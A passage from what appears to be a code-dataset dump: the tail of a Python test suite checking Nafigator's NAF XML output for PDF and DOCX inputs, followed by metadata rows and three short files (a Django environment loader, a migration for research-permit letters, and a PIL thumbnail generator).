{"from_term": "t4", "to_term": "t7", "rfunc": "xcomp"},
{"from_term": "t9", "to_term": "t8", "rfunc": "compound"},
{"from_term": "t7", "to_term": "t9", "rfunc": "obj"},
{"from_term": "t13", "to_term": "t10", "rfunc": "case"},
{"from_term": "t7", "to_term": "t13", "rfunc": "obl"},
{"from_term": "t12", "to_term": "t11", "rfunc": "compound"},
{"from_term": "t13", "to_term": "t12", "rfunc": "amod"},
{"from_term": "t17", "to_term": "t14", "rfunc": "compound"},
{"from_term": "t16", "to_term": "t15", "rfunc": "cc"},
{"from_term": "t14", "to_term": "t16", "rfunc": "conj"},
{"from_term": "t22", "to_term": "t18", "rfunc": "case"},
{"from_term": "t17", "to_term": "t22", "rfunc": "nmod"},
{"from_term": "t22", "to_term": "t19", "rfunc": "punct"},
{"from_term": "t22", "to_term": "t20", "rfunc": "amod"},
{"from_term": "t22", "to_term": "t21", "rfunc": "punct"},
{"from_term": "t26", "to_term": "t23", "rfunc": "cc"},
{"from_term": "t22", "to_term": "t26", "rfunc": "conj"},
{"from_term": "t26", "to_term": "t24", "rfunc": "det"},
{"from_term": "t26", "to_term": "t25", "rfunc": "compound"},
{"from_term": "t29", "to_term": "t27", "rfunc": "case"},
{"from_term": "t26", "to_term": "t29", "rfunc": "nmod"},
{"from_term": "t29", "to_term": "t28", "rfunc": "nummod"},
{"from_term": "t17", "to_term": "t30", "rfunc": "punct"},
{"from_term": "t37", "to_term": "t32", "rfunc": "mark"},
{"from_term": "t31", "to_term": "t37", "rfunc": "acl"},
{"from_term": "t37", "to_term": "t33", "rfunc": "mark"},
{"from_term": "t37", "to_term": "t34", "rfunc": "punct"},
{"from_term": "t37", "to_term": "t35", "rfunc": "nsubj"},
{"from_term": "t37", "to_term": "t36", "rfunc": "aux"},
{"from_term": "t43", "to_term": "t38", "rfunc": "mark"},
{"from_term": "t37", "to_term": "t43", "rfunc": "ccomp"},
{"from_term": "t37", "to_term": "t39", "rfunc": "compound:prt"},
{"from_term": "t37", "to_term": "t40", "rfunc": "advmod"},
{"from_term": "t37", "to_term": "t41", "rfunc": "punct"},
{"from_term": "t43", "to_term": "t42", "rfunc": "aux:pass"},
{"from_term": "t49", "to_term": "t44", "rfunc": "punct"},
{"from_term": "t43", "to_term": "t49", "rfunc": "obl"},
{"from_term": "t49", "to_term": "t45", "rfunc": "case"},
{"from_term": "t49", "to_term": "t46", "rfunc": "case"},
{"from_term": "t49", "to_term": "t47", "rfunc": "nmod:poss"},
{"from_term": "t49", "to_term": "t48", "rfunc": "compound"},
{"from_term": "t49", "to_term": "t50", "rfunc": "punct"},
{"from_term": "t43", "to_term": "t51", "rfunc": "punct"},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_10_pdf_multiwords(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.multiwords
expected = [
{
"id": "mw1",
"lemma": "set_out",
"pos": "VERB",
"type": "phrasal",
"components": [
{"id": "mw1.c1", "span": [{"id": "t37"}]},
{"id": "mw1.c2", "span": [{"id": "t39"}]},
],
}
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_11_raw(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.raw
expected = "The Nafigator package allows you to store NLP output from custom made spaCy and stanza pipelines with (intermediate) results and all processing steps in one format. Multiwords like in “we have set that out below” are recognized (depending on your NLP processor)."
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
# def test_command_line_interface(self):
# """Test the CLI."""
# runner = CliRunner()
# result = runner.invoke(cli.main)
# assert result.exit_code == 0
# # assert 'nafigator.cli.main' in result.output
# help_result = runner.invoke(cli.main, ['--help'])
# assert help_result.exit_code == 0
# assert '--help Show this message and exit.' in help_result.output
class TestNafigator_docx(unittest.TestCase):
def test_1_docx_generate_naf(self):
""" """
tree = parse2naf.generate_naf(
input=join("tests", "tests", "example.docx"),
engine="stanza",
language="en",
naf_version="v3.1",
dtd_validation=False,
params={},
nlp=None,
)
        assert tree.write(join("tests", "tests", "example.docx.naf.xml")) is None
def test_2_docx_header_filedesc(self):
""" """
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.header["fileDesc"]
expected = {
"filename": "tests\\tests\\example.docx",
"filetype": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
}
assert actual["filename"] == expected["filename"]
assert actual["filetype"] == expected["filetype"]
def test_3_docx_header_public(self):
""" """
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.header["public"]
expected = {
"{http://purl.org/dc/elements/1.1/}uri": "tests\\tests\\example.docx",
"{http://purl.org/dc/elements/1.1/}format": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
}
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
    # TODO: the formats test for the docx example is still a stub
    # def test_5_formats(self):
    #     assert actual == expected
def test_6_docx_entities(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.entities
expected = [
{
"id": "e1",
"type": "PRODUCT",
"text": "Nafigator",
"span": [{"id": "t2"}],
},
{"id": "e2", "type": "PRODUCT", "text": "Spacy", "span": [{"id": "t13"}]},
{"id": "e3", "type": "CARDINAL", "text": "one", "span": [{"id": "t27"}]},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_7_docx_text(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.text
expected = [
{
"text": "The",
"id": "w1",
"sent": "1",
"para": "1",
"page": "1",
"offset": "0",
"length": "3",
},
{
"text": "Nafigator",
"id": "w2",
"sent": "1",
"para": "1",
"page": "1",
"offset": "4",
"length": "9",
},
{
"text": "package",
"id": "w3",
"sent": "1",
"para": "1",
"page": "1",
"offset": "14",
"length": "7",
},
{
"text": "allows",
"id": "w4",
"sent": "1",
"para": "1",
"page": "1",
"offset": "22",
"length": "6",
},
{
"text": "you",
"id": "w5",
"sent": "1",
"para": "1",
"page": "1",
"offset": "29",
"length": "3",
},
{
"text": "to",
"id": "w6",
"sent": "1",
"para": "1",
"page": "1",
"offset": "33",
"length": "2",
},
{
"text": "store",
"id": "w7",
"sent": "1",
"para": "1",
"page": "1",
"offset": "36",
"length": "5",
},
{
"text": "NLP",
"id": "w8",
"sent": "1",
"para": "1",
"page": "1",
"offset": "42",
"length": "3",
},
{
"text": "output",
"id": "w9",
"sent": "1",
"para": "1",
"page": "1",
"offset": "46",
"length": "6",
},
{
"text": "from",
"id": "w10",
"sent": "1",
"para": "1",
"page": "1",
"offset": "53",
"length": "4",
},
{
"text": "custom",
"id": "w11",
"sent": "1",
"para": "1",
"page": "1",
"offset": "58",
"length": "6",
},
{
"text": "made",
"id": "w12",
"sent": "1",
"para": "1",
"page": "1",
"offset": "65",
"length": "4",
},
{
"text": "Spacy",
"id": "w13",
"sent": "1",
"para": "1",
"page": "1",
"offset": "70",
"length": "5",
},
{
"text": "and",
"id": "w14",
"sent": "1",
"para": "1",
"page": "1",
"offset": "76",
"length": "3",
},
{
"text": "stanza",
"id": "w15",
"sent": "1",
"para": "1",
"page": "1",
"offset": "80",
"length": "6",
},
{
"text": "pipelines",
"id": "w16",
"sent": "1",
"para": "1",
"page": "1",
"offset": "87",
"length": "9",
},
{
"text": "with",
"id": "w17",
"sent": "1",
"para": "1",
"page": "1",
"offset": "97",
"length": "4",
},
{
"text": "(",
"id": "w18",
"sent": "1",
"para": "1",
"page": "1",
"offset": "102",
"length": "1",
},
{
"text": "intermediate",
"id": "w19",
"sent": "1",
"para": "1",
"page": "1",
"offset": "103",
"length": "12",
},
{
"text": ")",
"id": "w20",
"sent": "1",
"para": "1",
"page": "1",
"offset": "115",
"length": "1",
},
{
"text": "results",
"id": "w21",
"sent": "1",
"para": "1",
"page": "1",
"offset": "117",
"length": "7",
},
{
"text": "and",
"id": "w22",
"sent": "1",
"para": "1",
"page": "1",
"offset": "125",
"length": "3",
},
{
"text": "all",
"id": "w23",
"sent": "1",
"para": "1",
"page": "1",
"offset": "129",
"length": "3",
},
{
"text": "processing",
"id": "w24",
"sent": "1",
"para": "1",
"page": "1",
"offset": "133",
"length": "10",
},
{
"text": "steps",
"id": "w25",
"sent": "1",
"para": "1",
"page": "1",
"offset": "144",
"length": "5",
},
{
"text": "in",
"id": "w26",
"sent": "1",
"para": "1",
"page": "1",
"offset": "150",
"length": "2",
},
{
"text": "one",
"id": "w27",
"sent": "1",
"para": "1",
"page": "1",
"offset": "153",
"length": "3",
},
{
"text": "format",
"id": "w28",
"sent": "1",
"para": "1",
"page": "1",
"offset": "157",
"length": "6",
},
{
"text": ".",
"id": "w29",
"sent": "1",
"para": "1",
"page": "1",
"offset": "163",
"length": "1",
},
{
"text": "Multiwords",
"id": "w30",
"sent": "2",
"para": "2",
"page": "1",
"offset": "166",
"length": "10",
},
{
"text": "like",
"id": "w31",
"sent": "2",
"para": "2",
"page": "1",
"offset": "177",
"length": "4",
},
{
"text": "in",
"id": "w32",
"sent": "2",
"para": "2",
"page": "1",
"offset": "182",
"length": "2",
},
{
"text": "“",
"id": "w33",
"sent": "2",
"para": "2",
"page": "1",
"offset": "185",
"length": "1",
},
{
"text": "we",
"id": "w34",
"sent": "2",
"para": "2",
"page": "1",
"offset": "186",
"length": "2",
},
{
"text": "have",
"id": "w35",
"sent": "2",
"para": "2",
"page": "1",
"offset": "189",
"length": "4",
},
{
"text": "set",
"id": "w36",
"sent": "2",
"para": "2",
"page": "1",
"offset": "194",
"length": "3",
},
{
"text": "that",
"id": "w37",
"sent": "2",
"para": "2",
"page": "1",
"offset": "198",
"length": "4",
},
{
"text": "out",
"id": "w38",
"sent": "2",
"para": "2",
"page": "1",
"offset": "203",
"length": "3",
},
{
"text": "below",
"id": "w39",
"sent": "2",
"para": "2",
"page": "1",
"offset": "207",
"length": "5",
},
{
"text": "”",
"id": "w40",
"sent": "2",
"para": "2",
"page": "1",
"offset": "212",
"length": "1",
},
{
"text": "are",
"id": "w41",
"sent": "2",
"para": "2",
"page": "1",
"offset": "214",
"length": "3",
},
{
"text": "recognized",
"id": "w42",
"sent": "2",
"para": "2",
"page": "1",
"offset": "218",
"length": "10",
},
{
"text": "(",
"id": "w43",
"sent": "2",
"para": "2",
"page": "1",
"offset": "229",
"length": "1",
},
{
"text": "depending",
"id": "w44",
"sent": "2",
"para": "2",
"page": "1",
"offset": "230",
"length": "9",
},
{
"text": "on",
"id": "w45",
"sent": "2",
"para": "2",
"page": "1",
"offset": "240",
"length": "2",
},
{
"text": "your",
"id": "w46",
"sent": "2",
"para": "2",
"page": "1",
"offset": "243",
"length": "4",
},
{
"text": "NLP",
"id": "w47",
"sent": "2",
"para": "2",
"page": "1",
"offset": "248",
"length": "3",
},
{
"text": "processor",
"id": "w48",
"sent": "2",
"para": "2",
"page": "1",
"offset": "252",
"length": "9",
},
{
"text": ")",
"id": "w49",
"sent": "2",
"para": "2",
"page": "1",
"offset": "261",
"length": "1",
},
{
"text": ".",
"id": "w50",
"sent": "2",
"para": "2",
"page": "1",
"offset": "262",
"length": "1",
},
]
diff = DeepDiff(actual, expected)
assert diff == dict(), diff
def test_8_docx_terms(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.terms
expected = [
{
"id": "t1",
"type": "open",
"lemma": "the",
"pos": "DET",
"morphofeat": "Definite=Def|PronType=Art",
"span": [{"id": "w1"}],
},
{
"id": "t2",
"type": "open",
"lemma": "Nafigator",
"pos": "PROPN",
"morphofeat": "Number=Sing",
"span": [{"id": "w2"}],
},
{
"id": "t3",
"type": "open",
"lemma": "package",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w3"}],
},
{
"id": "t4",
"type": "open",
"lemma": "allow",
"pos": "VERB",
"morphofeat": "Mood=Ind|Number=Sing|Person=3|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w4"}],
},
{
"id": "t5",
"type": "open",
"lemma": "you",
"pos": "PRON",
"morphofeat": "Case=Acc|Person=2|PronType=Prs",
"span": [{"id": "w5"}],
},
{
"id": "t6",
"type": "open",
"lemma": "to",
"pos": "PART",
"span": [{"id": "w6"}],
},
{
"id": "t7",
"type": "open",
"lemma": "store",
"pos": "VERB",
"morphofeat": "VerbForm=Inf",
"span": [{"id": "w7"}],
},
{
"id": "t8",
"type": "open",
"lemma": "nlp",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w8"}],
},
{
"id": "t9",
"type": "open",
"lemma": "output",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w9"}],
},
{
"id": "t10",
"type": "open",
"lemma": "from",
"pos": "ADP",
"span": [{"id": "w10"}],
},
{
"id": "t11",
"type": "open",
"lemma": "custom",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w11"}],
},
{
"id": "t12",
"type": "open",
"lemma": "make",
"pos": "VERB",
"morphofeat": "Tense=Past|VerbForm=Part",
"span": [{"id": "w12"}],
},
{
"id": "t13",
"type": "open",
"lemma": "spacy",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w13"}],
},
{
"id": "t14",
"type": "open",
"lemma": "and",
"pos": "CCONJ",
"span": [{"id": "w14"}],
},
{
"id": "t15",
"type": "open",
"lemma": "stanza",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w15"}],
},
{
"id": "t16",
"type": "open",
"lemma": "pipeline",
"pos": "NOUN",
"morphofeat": "Number=Plur",
"span": [{"id": "w16"}],
},
{
"id": "t17",
"type": "open",
"lemma": "with",
"pos": "ADP",
"span": [{"id": "w17"}],
},
{
"id": "t18",
"type": "open",
"lemma": "(",
"pos": "PUNCT",
"span": [{"id": "w18"}],
},
{
"id": "t19",
"type": "open",
"lemma": "intermediate",
"pos": "ADJ",
"morphofeat": "Degree=Pos",
"span": [{"id": "w19"}],
},
{
"id": "t20",
"type": "open",
"lemma": ")",
"pos": "PUNCT",
"span": [{"id": "w20"}],
},
{
"id": "t21",
"type": "open",
"lemma": "result",
"pos": "NOUN",
"morphofeat": "Number=Plur",
"span": [{"id": "w21"}],
},
{
"id": "t22",
"type": "open",
"lemma": "and",
"pos": "CCONJ",
"span": [{"id": "w22"}],
},
{
"id": "t23",
"type": "open",
"lemma": "all",
"pos": "DET",
"span": [{"id": "w23"}],
},
{
"id": "t24",
"type": "open",
"lemma": "processing",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w24"}],
},
{
"id": "t25",
"type": "open",
"lemma": "step",
"pos": "NOUN",
"morphofeat": "Number=Plur",
"span": [{"id": "w25"}],
},
{
"id": "t26",
"type": "open",
"lemma": "in",
"pos": "ADP",
"span": [{"id": "w26"}],
},
{
"id": "t27",
"type": "open",
"lemma": "one",
"pos": "NUM",
"morphofeat": "NumType=Card",
"span": [{"id": "w27"}],
},
{
"id": "t28",
"type": "open",
"lemma": "format",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w28"}],
},
{
"id": "t29",
"type": "open",
"lemma": ".",
"pos": "PUNCT",
"span": [{"id": "w29"}],
},
{
"id": "t30",
"type": "open",
"lemma": "multiword",
"pos": "NOUN",
"morphofeat": "Number=Plur",
"span": [{"id": "w30"}],
},
{
"id": "t31",
"type": "open",
"lemma": "like",
"pos": "ADP",
"span": [{"id": "w31"}],
},
{
"id": "t32",
"type": "open",
"lemma": "in",
"pos": "ADP",
"span": [{"id": "w32"}],
},
{
"id": "t33",
"type": "open",
"lemma": '"',
"pos": "PUNCT",
"span": [{"id": "w33"}],
},
{
"id": "t34",
"type": "open",
"lemma": "we",
"pos": "PRON",
"morphofeat": "Case=Nom|Number=Plur|Person=1|PronType=Prs",
"span": [{"id": "w34"}],
},
{
"id": "t35",
"type": "open",
"lemma": "have",
"pos": "AUX",
"morphofeat": "Mood=Ind|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w35"}],
},
{
"id": "t36",
"type": "open",
"lemma": "set",
"pos": "VERB",
"morphofeat": "Tense=Past|VerbForm=Part",
"component_of": "mw1",
"span": [{"id": "w36"}],
},
{
"id": "t37",
"type": "open",
"lemma": "that",
"pos": "SCONJ",
"span": [{"id": "w37"}],
},
{
"id": "t38",
"type": "open",
"lemma": "out",
"pos": "ADP",
"component_of": "mw1",
"span": [{"id": "w38"}],
},
{
"id": "t39",
"type": "open",
"lemma": "below",
"pos": "ADV",
"span": [{"id": "w39"}],
},
{
"id": "t40",
"type": "open",
"lemma": '"',
"pos": "PUNCT",
"span": [{"id": "w40"}],
},
{
"id": "t41",
"type": "open",
"lemma": "be",
"pos": "AUX",
"morphofeat": "Mood=Ind|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w41"}],
},
{
"id": "t42",
"type": "open",
"lemma": "recognize",
"pos": "VERB",
"morphofeat": "Tense=Past|VerbForm=Part|Voice=Pass",
"span": [{"id": "w42"}],
},
{
"id": "t43",
"type": "open",
"lemma": "(",
"pos": "PUNCT",
"span": [{"id": "w43"}],
},
{
"id": "t44",
"type": "open",
"lemma": "depend",
"pos": "VERB",
"morphofeat": "VerbForm=Ger",
"span": [{"id": "w44"}],
},
{
"id": "t45",
"type": "open",
"lemma": "on",
"pos": "ADP",
"span": [{"id": "w45"}],
},
{
"id": "t46",
"type": "open",
"lemma": "you",
"pos": "PRON",
"morphofeat": "Person=2|Poss=Yes|PronType=Prs",
"span": [{"id": "w46"}],
},
{
"id": "t47",
"type": "open",
"lemma": "nlp",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w47"}],
},
{
"id": "t48",
"type": "open",
"lemma": "processor",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w48"}],
},
{
"id": "t49",
"type": "open",
"lemma": ")",
"pos": "PUNCT",
"span": [{"id": "w49"}],
},
{
"id": "t50",
"type": "open",
"lemma": ".",
"pos": "PUNCT",
"span": [{"id": "w50"}],
},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_9_docx_dependencies(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.deps
expected = [
{"from_term": "t3", "to_term": "t1", "rfunc": "det"},
{"from_term": "t4", "to_term": "t3", "rfunc": "nsubj"},
{"from_term": "t3", "to_term": "t2", "rfunc": "compound"},
{"from_term": "t4", "to_term": "t5", "rfunc": "obj"},
{"from_term": "t7", "to_term": "t6", "rfunc": "mark"},
{"from_term": "t4", "to_term": "t7", "rfunc": "xcomp"},
{"from_term": "t9", "to_term": "t8", "rfunc": "compound"},
{"from_term": "t7", "to_term": "t9", "rfunc": "obj"},
{"from_term": "t13", "to_term": "t10", "rfunc": "case"},
{"from_term": "t9", "to_term": "t13", "rfunc": "nmod"},
{"from_term": "t12", "to_term": "t11", "rfunc": "compound"},
{"from_term": "t13", "to_term": "t12", "rfunc": "amod"},
{"from_term": "t16", "to_term": "t14", "rfunc": "cc"},
{"from_term": "t13", "to_term": "t16", "rfunc": "conj"},
{"from_term": "t16", "to_term": "t15", "rfunc": "compound"},
{"from_term": "t21", "to_term": "t17", "rfunc": "case"},
{"from_term": "t7", "to_term": "t21", "rfunc": "obl"},
{"from_term": "t21", "to_term": "t18", "rfunc": "punct"},
{"from_term": "t21", "to_term": "t19", "rfunc": "amod"},
{"from_term": "t21", "to_term": "t20", "rfunc": "punct"},
{"from_term": "t25", "to_term": "t22", "rfunc": "cc"},
{"from_term": "t13", "to_term": "t25", "rfunc": "conj"},
{"from_term": "t25", "to_term": "t23", "rfunc": "det"},
{"from_term": "t25", "to_term": "t24", "rfunc": "compound"},
{"from_term": "t28", "to_term": "t26", "rfunc": "case"},
{"from_term": "t25", "to_term": "t28", "rfunc": "nmod"},
{"from_term": "t28", "to_term": "t27", "rfunc": "nummod"},
{"from_term": "t4", "to_term": "t29", "rfunc": "punct"},
{"from_term": "t36", "to_term": "t31", "rfunc": "mark"},
{"from_term": "t30", "to_term": "t36", "rfunc": "acl"},
{"from_term": "t36", "to_term": "t32", "rfunc": "mark"},
{"from_term": "t36", "to_term": "t33", "rfunc": "punct"},
{"from_term": "t36", "to_term": "t34", "rfunc": "nsubj"},
{"from_term": "t36", "to_term": "t35", "rfunc": "aux"},
{"from_term": "t42", "to_term": "t37", "rfunc": "mark"},
{"from_term": "t36", "to_term": "t42", "rfunc": "ccomp"},
{"from_term": "t36", "to_term": "t38", "rfunc": "compound:prt"},
{"from_term": "t36", "to_term": "t39", "rfunc": "advmod"},
{"from_term": "t36", "to_term": "t40", "rfunc": "punct"},
{"from_term": "t42", "to_term": "t41", "rfunc": "aux:pass"},
{"from_term": "t48", "to_term": "t43", "rfunc": "punct"},
{"from_term": "t42", "to_term": "t48", "rfunc": "obl"},
{"from_term": "t48", "to_term": "t44", "rfunc": "case"},
{"from_term": "t48", "to_term": "t45", "rfunc": "case"},
{"from_term": "t48", "to_term": "t46", "rfunc": "nmod:poss"},
{"from_term": "t48", "to_term": "t47", "rfunc": "compound"},
{"from_term": "t48", "to_term": "t49", "rfunc": "punct"},
{"from_term": "t42", "to_term": "t50", "rfunc": "punct"},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_10_docx_multiwords(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.multiwords
expected = [
{
"id": "mw1",
"lemma": "set_out",
"pos": "VERB",
"type": "phrasal",
"components": [
{"id": "mw1.c1", "span": [{"id": "t36"}]},
{"id": "mw1.c2", "span": [{"id": "t38"}]},
],
}
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_11_docx_raw(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.raw
expected = "The Nafigator package allows you to store NLP output from custom made Spacy and stanza pipelines with (intermediate) results and all processing steps in one format. Multiwords like in “we have set that out below” are recognized (depending on your NLP processor)."
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
| 32.157531 | 286 | 0.283854 | 4,897 | 69,814 | 3.983051 | 0.093731 | 0.033837 | 0.018149 | 0.015381 | 0.723661 | 0.626967 | 0.616509 | 0.443117 | 0.390003 | 0.334376 | 0 | 0.060031 | 0.523505 | 69,814 | 2,170 | 287 | 32.17235 | 0.526303 | 0.0485 | 0 | 0.667314 | 0 | 0.000971 | 0.240661 | 0.014328 | 0 | 0 | 0 | 0 | 0.010685 | 1 | 0.009713 | false | 0.001943 | 0.002428 | 0 | 0.013113 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcdc072e1fbfda78b87aa6ba6f67523a4ef0eadf | 617 | py | Python | src/openpersonen/setup.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 2 | 2020-08-26T11:24:43.000Z | 2021-07-28T09:46:40.000Z | src/openpersonen/setup.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 153 | 2020-08-26T10:45:35.000Z | 2021-12-10T17:33:16.000Z | src/openpersonen/setup.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | null | null | null | """
Bootstrap the environment.
Load the secrets from the .env file and store them in the environment, so
they are available for Django settings initialization.
.. warning::
do NOT import anything Django related here, as this file needs to be loaded
before Django is initialized.
"""
import os
from dotenv import load_dotenv
def setup_env():
# load the environment variables containing the secrets/config
dotenv_path = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, ".env")
load_dotenv(dotenv_path)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "openpersonen.conf.dev")
| 26.826087 | 87 | 0.752026 | 88 | 617 | 5.147727 | 0.602273 | 0.092715 | 0.05298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165316 | 617 | 22 | 88 | 28.045455 | 0.879612 | 0.562399 | 0 | 0 | 0 | 0 | 0.179389 | 0.164122 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
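The docstring in the `setup.py` record above describes loading secrets from a `.env` file into the environment before Django settings are initialized. A minimal stdlib-only sketch of what `dotenv.load_dotenv` does for that pattern (the `load_env_file` helper and the `EXAMPLE_*` variable names are illustrative, not part of the original project):

```python
import os
import tempfile

def load_env_file(path):
    # Minimal stand-in for dotenv.load_dotenv: read KEY=VALUE lines and
    # export them without overwriting variables that are already set.
    with open(path) as handle:
        for line in handle:
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            os.environ.setdefault(key.strip(), value.strip())

# demo with a throwaway .env file (variable names are illustrative only)
with tempfile.NamedTemporaryFile("w", suffix=".env", delete=False) as tmp:
    tmp.write("EXAMPLE_SECRET_KEY=dev-secret\n# a comment\nEXAMPLE_DEBUG=1\n")
    env_path = tmp.name

load_env_file(env_path)
print(os.environ["EXAMPLE_SECRET_KEY"])  # -> dev-secret
os.unlink(env_path)
```

Because `setdefault` is used, values already present in the process environment win over the file, which is why the original module can safely call this before Django starts.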
fcdd550e33ec3168390a3e5561a28942444966d7 | 1,065 | py | Python | unisan/lemlit/migrations/0013_auto_20170901_0649.py | kurniantoska/ichsan_proj | f79cbcb896df902e129dcdb2affc89dc4f3844ef | [
"Apache-2.0"
] | null | null | null | unisan/lemlit/migrations/0013_auto_20170901_0649.py | kurniantoska/ichsan_proj | f79cbcb896df902e129dcdb2affc89dc4f3844ef | [
"Apache-2.0"
] | 2 | 2022-02-12T05:49:41.000Z | 2022-02-12T17:40:30.000Z | unisan/lemlit/migrations/0013_auto_20170901_0649.py | kurniantoska/ichsan_proj | f79cbcb896df902e129dcdb2affc89dc4f3844ef | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-31 22:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lemlit', '0012_remove_suratizinpenelitianmahasiswa_dosen'),
]
operations = [
migrations.AddField(
model_name='suratizinpenelitianmahasiswa',
name='nama_instansi',
field=models.CharField(default='Nama Kantor', max_length=80),
preserve_default=False,
),
migrations.AddField(
model_name='suratizinpenelitianmahasiswa',
name='nomor_surat',
field=models.CharField(default='xxx/LEMLIT-UNISAN/GTO/VIII/2017', max_length=50, unique=True),
preserve_default=False,
),
migrations.AddField(
model_name='suratizinpenelitianmahasiswa',
name='tujuan_surat',
field=models.CharField(default='Gorontalo', max_length=20),
preserve_default=False,
),
]
| 31.323529 | 106 | 0.631925 | 102 | 1,065 | 6.401961 | 0.568627 | 0.082695 | 0.105666 | 0.124043 | 0.430322 | 0.332312 | 0.24196 | 0.24196 | 0.24196 | 0 | 0 | 0.03939 | 0.261033 | 1,065 | 33 | 107 | 32.272727 | 0.790343 | 0.06385 | 0 | 0.461538 | 1 | 0 | 0.224346 | 0.161972 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fce82f3e40f49996cececad59c6952decb597ac4 | 838 | py | Python | app/thumbnail.py | Kbman99/NetSecShare | 9bf4247d1c64c92dd8719747bc2e5b6147e34dc0 | [
"MIT"
] | null | null | null | app/thumbnail.py | Kbman99/NetSecShare | 9bf4247d1c64c92dd8719747bc2e5b6147e34dc0 | [
"MIT"
] | null | null | null | app/thumbnail.py | Kbman99/NetSecShare | 9bf4247d1c64c92dd8719747bc2e5b6147e34dc0 | [
"MIT"
] | null | null | null | from PIL import Image
import os
import sys
from app import app
def generate_thumbnail(infile_name):
try:
size = 206.67, 256.29
target_dir = app.config['UPLOAD_PATH']
# found_file = ''
# for name in os.listdir(target_dir):
# if infile_name in name:
# found_file = name
file_path = os.path.join(target_dir + '/', infile_name)
save_path = os.path.join(target_dir + '/', os.path.splitext(infile_name)[0])
print(target_dir, file=sys.stderr)
print(infile_name, file=sys.stderr)
outfile = Image.open(file_path)
outfile.thumbnail(size)
outfile.save(save_path + '_thumbnail.png')
except Exception as e:
print('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e), e, file=sys.stderr)
print(e)
